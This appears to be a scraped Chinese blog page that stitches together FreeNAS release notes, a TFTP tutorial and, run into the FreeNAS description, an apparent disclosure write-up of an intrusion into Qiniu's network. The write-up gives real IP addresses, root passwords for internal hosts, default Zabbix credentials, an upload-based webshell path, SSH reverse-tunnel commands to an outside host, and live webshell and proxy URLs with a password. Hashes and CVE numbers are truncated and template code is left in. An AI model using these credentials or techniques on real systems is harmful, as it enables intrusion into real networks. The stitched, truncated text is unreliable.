freenas默认密码 忘记密码,怎么办

FreeNAS是一份基于FreeBSD的小型操作系统,它提供免费的网络附加存储(NAS)服务(CIFS、FTP、NFS)。
Well, we said 9.2.1.6 would be the last in the 9.2.1.x series, but CVE- (a possible remote Samba exploit) forced us to change those plans!
While we were at it, we also added a few small performance improvements and brought over a small feature from 9.3, namely the ability to do replication on a direct link without encryption, potentially speeding up replication anywhere from 3-4X (especially over 10GbE). This is generally most useful when doing initial replication to a backup box, while they are co-located together, after which normal encryption can be used in sending the deltas.
Appended are the release notes for 9.2.1.7. We encourage all existing 9.2.1.x users to upgrade. Thanks!
- The FreeNAS Development Team
Samba updated to 4.1.11. This addresses http://www.samba.org/samba/security/CVE-
Increase performance of Directory Copy from CIFS
Add support for the None Cipher in SSH. This can be used to improve replication performance at the expense of sending your data over the wire in cleartext. (Think private 10Gbe interlink)
Resolve issue with vlan interface locking that could cause a kernel panic when creating a number of VLAN interfaces.
Add support for compressing replication jobs with lz4
Trackback from your site.
FreeNAS是一份基于FreeBSD的小型操作系统,它提供免费的网络附加存储(NAS)服务(CIFS、FTP、NFS)。
Jordan Hubbard has announced the release of FreeNAS 9.1.1, an open-source storage platform based on FreeBSD:
” The FreeNAS development team is delighted to announce the general release of FreeNAS 9.1.1. This release offers small, but significant, improvements to FreeNAS 9.1.0. A number of cosmetic issues, user interface tracebacks and outright bugs (such as 32-bit plugins not working) have been addressed since 9.1 was released. A few features that were known to be broken, such as AIO in Samba 3 or IPv6 in plugin jails, were also disabled to avoid people shooting their feet off. Finally, a number of important ZFS stability fixes were also picked up from the TrueOS repo during the creation of 9.1.1-RELEASE. Thank you for all your participation and assistance during the 9.1.1 beta and release candidate process, this release benefited significantly from your suggestions and bug reports!”
Here is the brief release announcement with a link to a full changelog.
日发布FreeNAS 8.3.0-RELEASE-p1
Filename: FreeNAS-8.3.0-RELEASE-p1-x86.iso SHA256 Hash: 162cd42bc9520fecd008d3aef0aa35db
Filename: FreeNAS-8.3.0-RELEASE-p1-x64.iso SHA256 Hash: 694e9b2f572c96b41cfaa5a611f0f8a39ffffa68d607e75f08d9f20
日发布FreeNAS-8.2.0-RELEASE
Filename: FreeNAS-8.2.0-RELEASE-p1-x64.iso SHA256 Hash: 8bc1cae01a82c39d2c7cccbf9aed3ba1fdddd6b96a7158b27bac9
Filename: FreeNAS-8.2.0-RELEASE-p1-x86.iso SHA256 Hash: ecb7ba5eaa04b3ed4ff
今天我们将研究FreeNAS提供的另一项服务——TFTP,踏实简单文件传输协议的简称,是简化版的FTP。在开始本教程之前,咱们首先简单了解了什么是TFTP,TFTP的缺点以及运行原理。
tftp使用帮助 tftp命令
什么是TFTP,简单文件传输协议
TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服 务。是一种简化的FTP,于1980年定义。它有以下特点:
不能列出索引内容。
无验证或加密机制。
被用于从远程服务器读取或写入文件。
使用UDP(端口69)作为其传输协议(不像FTP使用TCP端口21)。
支持三种传输模式:netascii、octet、mail。前两者符合FTP协议中的ASCII和image(binary)模式;第三种很少使用,目前已经废弃。
由于TFTP缺少安全性,在开放式因特网上传输非常危险,因此通常仅允许下载数据而不允许上传数据,或用于私人本地网络以及某些特殊场合。
一、FreeNAS的TFTP服务使用
学前准备工作。在F盘新建两个文件夹:budeyan文件夹存放了 budeyan.txt和atx690.rar两个文件,用于TFTP上传测试;budeyancom文件夹用于下载TFTP服务器文件测试。
一、开启FreeNAS的TFTP服务
开启用VMware虚拟的FreeNAS服务器,输入IP地址,打开“FreeNAS Web GUI”登录。打开“Services–&TFTP”,选中“Trivial File Transfer Protocol”右侧的“Enable”,在“Directory”输入路径“/mnt/data/”,或点右侧浏览指定TFTP服务根目录。选中 “Allow new files”即允许写入新文件(Allow new files to be created.)。高级设置“Advanced settings”选择默认。“Save and Restart”保存。
FreeNAS WEBGUI TFTP的设置
The directory containing the files you want to publish. The remote host does not need to pass along the directory as part of the transfer.
选中你要发布的文件夹目录。在远程服务器上传或下载文件时并不需要输入完整路径。例如传送文件“/mnt/data/tftp/budeyan.txt”时使用相对路径:“tftp/budeyan.txt”而非“/mnt/data/tftp/5ihll.txt”。
出于安全考虑,在默认情况下,仅允许已存在的文件上传(By default, only already existing files can be uploaded.)。这句话的意思就是说,即使被发现服务器开着TFTP,在不选中“允许写入新文件”时,非知情者很难猜中服务器TFTP含有的文件。因此不存在被恶意上传写入文件的可能,提高了安全性。
使用tftp命令传送文件 TFTP
二、测试FreeNAS的TFTP服务
运行CMD后,输入下述TFTP命令,把budeyan文件夹下budeyan.txt和atx690.rar传送到FreeNAS服务器。如果不知道如何使用tftp命令,可以在CMD下,输入tftp /?,寻求帮助。这里atx690.rar、ATX690.rar在Windows下是同一个文件,而在FreeNAS下是两个文件。原因是FreeNAS区分大小写,而Windows不区分大小写。
tftp -i 192.168.1.21 put F:\budeyan\budeyan.txt
tftp -i 192.168.1.21 put F:\budeyan\atx690.rar
tftp -i 192.168.1.21 put F:\budeyan\ATX690.rar
freenas的TFTP tftp上传文件成功
在FreeNAS下输入数字6进入Shell。输入cd /mnt/data进入data文件夹,s -l列出文件。细心的朋友会发现服务器data下有两个文件同名文件atx690.rar和ATX690.rar。执行删除命令rm ATX690.rar删除后,atx690.rar依然存在。验证了FreeNAS是区分大小写的,一大一小就是两个文件了。习惯于 Windows的初学者朋友,请注意了,别因一时疏忽忘记大小写让你郁闷的抓耳挠腮而不知所以然。
tftp下载 tftp下载命令 freenas的TFTP
三、FreeNAS的TFTP服务下载
运行CMD,然后输入下面tftp命令。从TFTP服务器根目录下在atx690.rar、budeyan.txt到文件夹budeyancom。在tftp下载FreeNAS的tftp服务器文件时,我进行了重命名(仅仅是大小写——虽然对Windows没用)。请确保保存的文件夹存在,不然下载会失败。有兴趣的朋友,可以在FreeNAS Web GUI里,去掉“Allow new files”,进行文件传送测试。
tftp -i 192.168.1.21 get ATX690.rar F:\budeyancom\atx690.rar
tftp -i 192.168.1.21 get budeyan.txt F:\budeyancom\budeyan.txt
FreeNAS国内镜像下载
  是一套免费的NAS服务器,它能将一部普通PC变成网络存储服务器。该软件基于FreeBSD,Samba 及PHP,支持CIFS (samba), FTP, NFS protocols, Software RAID (0,1,5) 及 web 界面的设定工具。用户可通过Windows、Macs、FTP、SSH 及网络文件系统 (NFS) 来访问存储服务器;FreeNAS可被安装于硬盘或移动介质USB Flash Disk上。FreeNAS 服务器前途无量;它是组建简单网络存储服务器的绝佳选择,免去安装整套Linux或 FreeBSD 的烦恼。七牛云存储某站漏洞可跨越边界漫游内网七牛的安全总体来说还是不错的,后台开启了双因素(密码+手机动态验证码),VPN也不是很好找,邮箱用的是腾讯企业邮箱。用上个报过的Ldap匿名访问漏洞,拿到的部分用户名进行爆破,却一无所获,只能另寻他法。0x01------切入点这里从github里找到一个七牛云上的一个测试账号/landylee1989/faster/blob/ac713f628ba81ef59c8a91c10ca6c2fa437a5815/spec/support/baseapi/acc.rb&&这个账号是QA用的测试帐号,初看貌似没什么用,但在七牛整个防护较为严的情况下,一些细小的琐碎信息却可能成为突破的重要条件,本案例中就是登录IP222.73.202.226&&猜测可能是七牛的某个出口IP,用Nmap进行全端口扫描后,开放的端口如下nmap -sV --open -v -p 1-.202.226 -oX 222.73.202.226.xml&&突破口选了WebITDB资产管理系统:http://222.73.202.226:9000看了下是一个叫做ITDB的资产管理应用,果断去官网下载源码。这套系统用的数据库是sqlite,数据库放在了WEB目录下,默认路径是:http://IP/data/itdb.db数据库的名字是可以修改的,但管理员并没有修改,且Apache开启了目录浏览,于是直接下载数据库。&&数据库里明文记录了管理员的密码&&0x02------Get Webshell!后台有个上传文件的功能,是丢给uploadframe_frame.php处理的。&&上传用到的函数是upload&&我们跟进下upload函数&&最后上传到服务器上的文件名是文件属性+上传的文件名+上传的后缀,一个很明显的上传漏洞。$uploadfile变量定义的位置在/data/files/下,所以webshell地址是:http://222.73.202.226:9900/data/files/other-ae-e93c.php上菜刀&&0x03------打入办公网IP是内网地址,确定是映射出来的。&&然后用reGeorg代理进入内网,速度和稳定性不怎么好,但该服务器的内核较高,没找到对应的提权EXP。决定拿下内网一台服务器作跳板。在服务器上挂了个脚本,扫描192.168.220.*这个网段的80,和22端口。扫Web端口一是为了通过发现的应用,确认此网段处于内网的什么区域(是办公网、DMZ还是生产网?),二是方便获取其他系统的权限。通过发现的几个应用,推测出这个网段是办公网的一部分http://192.168.220.5 Freenas,数据存储http://192.168.220.179 Panabit,流控系统http://192.168.220.50 brother,打印机其中Freenas使用了和ITDB一样的密码,在Web界面上开启SSH,准备作跳板机用。http://192.168.220.5root/QQQnnn111&&可问题是,他是FreeBSD的系统-.-,不太熟悉,一些渗透工具也比较难安装,果断开始找其他开放SSH端口的服务器。这里找到5个:192.168.220.179 root/panaos192.168.220.182 root/QQQnnn111!192.168.220.240 root/QQQnnn111192.168.220.31 root/QQQnnn111192.168.220.34 root/QQQnnn1110x04------跨到核心区通过前期的信息收集,以及内网渗透拿到的一些零碎片段,拼凑了一个七牛内网简陋的拓扑(可能有错)&&我们目前的位置在图上的左下角(192.168.220.*),要跨网段访问生产网。找了几个生产网的IP(10.*.*.*),traceroute了下,没有路由过去。到这里其实有多种方法跨到核心生产网:1. 渗透办公网中的PC机,通过PC找到突破进入生产网的路径。经过探测,PC机网段集中在192.168.200.*和192.168.201.*2. 找到核心或边界的防火墙和交换机,进一步捋清七牛的拓扑情况,通过这些设备跨网段访问。3. 利用目前获取到的办公网机器的一些权限,进一步收集敏感信息。我选择了3前文中提到了一个Panabit的系统,这是一个流控设备,可以查看用户访问的IP和使用的协议。先登录这个系统,把443端口通过SSH映射出来ssh -fCNR 3456:localhost:443 [email protected]再将本地的0.0.0.0绑定35632端口,这样所有IP都可以访问了ssh &fCNL *:35632:localhost:3456 localhost&&通过查看日志,发现内网一台机器访问了这个IP&&原来是个Zabbix,而且部署在了国外。使用默认口令admin/zabbix登录成功&&看了下Zabbix Server和Agent的IP段,都是10.20.*.*,应该是生产网了吧,希望没猜错&&本以为这是渗透核心生产网的起点,但当时挂了个reGeorg,想先看下,结果悲剧了,Nginx挂掉了。本来sudo没有密码,可以直接加个用户然后把SSH反弹出来啊(有外网防火墙)。。。也算是碰了下核心生产网的边缘吧。这是webshell和tunnel的地址,麻烦删掉。http://54.183.142.88/ch.php webshell,密码_3http://54.183.142.88/tunnel.php reGerog代理见详细说明解决方案:1. ITDB这个系统,大部分用户都是弱口令,比如admin和1234,普通用户都可以getshell,建议放内网吧。如果必须放外网,建议清理弱口令,修改现有口令,修改数据库名字,关闭apache的目录浏览2. 内网弱口令和密码通用问题是业界老大难问题,可看情况整改。3. 对你们七牛的渗透真是见鬼了,上次挂掉一个洋葱,这次又挂掉了一个Zabbix,感觉有些抱歉。但对你们来说未尝不是一个好事,因为阻止了进一步的渗透。对了,Zabbix服务器的Nginx重启后,改下默认口令吧。就爱阅读网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。
欢迎转载:
推荐:    
4【原】初步认识电脑温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(1818)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_080068',
blogTitle:'freeNAS文件共享',
blogAbstract:'&\r\n一.需求\r\n(1)财务部门内部文件共享,只能财务部门内部人员看到文件,具有r,w,x权限\r\n(2)清算部门内部文件共享权限,只能清算部门内部人员看到文件,具有r,w,x权限\r\n(3)共享文件夹,财务部门给清算部门共享的数据,财务部门对于文件夹具有r,w权限,清算部门只有read的权限\r\n二.利用freeNAS提供的CIFS/SMB服务\r\n(1)建立三个文件夹finance, finance_to_settlement, settlement。如下图是finance的配置文件\r\n清算用户\"qingsuan\"的管理文件夹是 settlement,配置如下\r\n&\r\n',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:3,
publishTime:1,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}

我要回帖

更多关于 freenas初始密码 的文章

 

随机推荐